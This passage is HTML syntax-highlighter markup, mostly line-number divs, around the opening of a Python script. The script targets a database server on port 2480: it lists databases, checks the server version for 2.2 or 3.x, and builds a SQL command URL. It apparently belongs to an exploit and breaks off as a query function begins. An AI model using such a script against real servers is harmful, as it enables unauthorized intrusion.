data-line=\"crayon-5967f204b10dc863783322-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-151\">151<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-1\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-2\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-3\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">json<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-4\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">string<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-5\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">random<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-7\"><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-9\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-11\"><span class=\"crayon-st\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-14\"><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/command\/GratefulDeadConcerts\/sql\/-\/20?format=rid,type,version,class,graph&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-17\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">random_function_name<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">chars<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-k\">string<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ascii_lowercase<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">string<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">digits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-k\">random<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">choice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">chars<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">_<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">range<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-20\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enum_databases<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2480&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/listDatabases&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print &#8220;[+] Database Enumeration successful&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">database<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-k\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;databases&#8217;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">database<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-31\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-33\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">check_version<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2480&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/listDatabases&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;server&#8217;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print headers<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;2.2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">headers <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;3.&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-46\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">permission<\/span><span class=\"crayon-sy\">,<\/span><span 